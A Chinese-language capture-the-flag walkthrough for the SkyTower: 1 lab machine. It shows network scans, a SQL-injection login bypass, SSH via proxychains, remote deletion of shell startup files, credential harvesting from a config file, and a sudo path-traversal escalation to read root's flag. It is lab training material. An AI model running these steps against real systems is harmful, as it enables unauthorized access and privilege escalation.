主要利用方式：1、登录模块SQL注入绕过方式进入后台，获取了一个账号密码；2、配置proxychains 代理，SSH登录；登录及退出，推断bashrc文件问题。3、登录及删除指令，删除bashrc文件后正常登录。4、查看web应用配置文件，获取数据库配置信息。5、登录获取其他用户信息后可以尝试切换用户，使用sudo -l查看用户权限。6、通过提权查看及列举，获取root目录下的flag.txt文件内容。

靶场: vulnhub.com靶机名称: SKYTOWER: 1难度: 中级发布时间: 2014 年 6月 26日下载地址：https://www.vulnhub.com/entry/skytower-1,96/备注：还是有点东西的，但东西不多！~

VirtualBox(Vmware)、网络连接模式：NAT模式、DHCP服务：启用、IP地址：自动分配攻击IP：10.0.2.7靶机IP：10.0.2.28

└─$ sudo arp-scan -I eth0 -l

└─$ sudo nmap -p- 10.0.2.28 

└─$ sudo nmap -p22,80,3128 -sV -A 10.0.2.28  

http://10.0.2.28/

└─$ dirsearch -u http://10.0.2.28

获取一个账号及密码：Username:john、Password: hereisjohn  并提示通过SSH登录

└─$ sudo vi /etc/proxychains4.conf

└─$ proxychains ssh john@10.0.2.28

└─$ proxychains ssh john@10.0.2.28 /bin/bash

如果想要解决以上问题01、执行mv， 将.bashrc 改成.Bashrc.bak文件名称02、执行rm，直接删除bashrc的文件03、直接反弹shell来执行

cd /var/wwwlscat login.php

$db = new mysqli('localhost', 'root', 'root', 'SkyTech');

└─$ proxychains ssh john@10.0.2.28 rm .bashrc└─$ proxychains ssh john@10.0.2.28 ls -la   

|  1 | [email protected]    | hereisjohn   ||  2 | [email protected]    | ihatethisjob ||  3 | [email protected] | senseable  |

└─$ proxychains ssh sara@10.0.2.28 ls -la└─$ proxychains ssh sara@10.0.2.28 rm .bash_logout└─$ proxychains ssh sara@10.0.2.28 

sara@SkyTower:~$ sudo -l

sara@SkyTower:~$ sudo /bin/ls /accounts/../../../root/

sara@SkyTower:~$ sudo /bin/cat /accounts/../../../root/flag.txt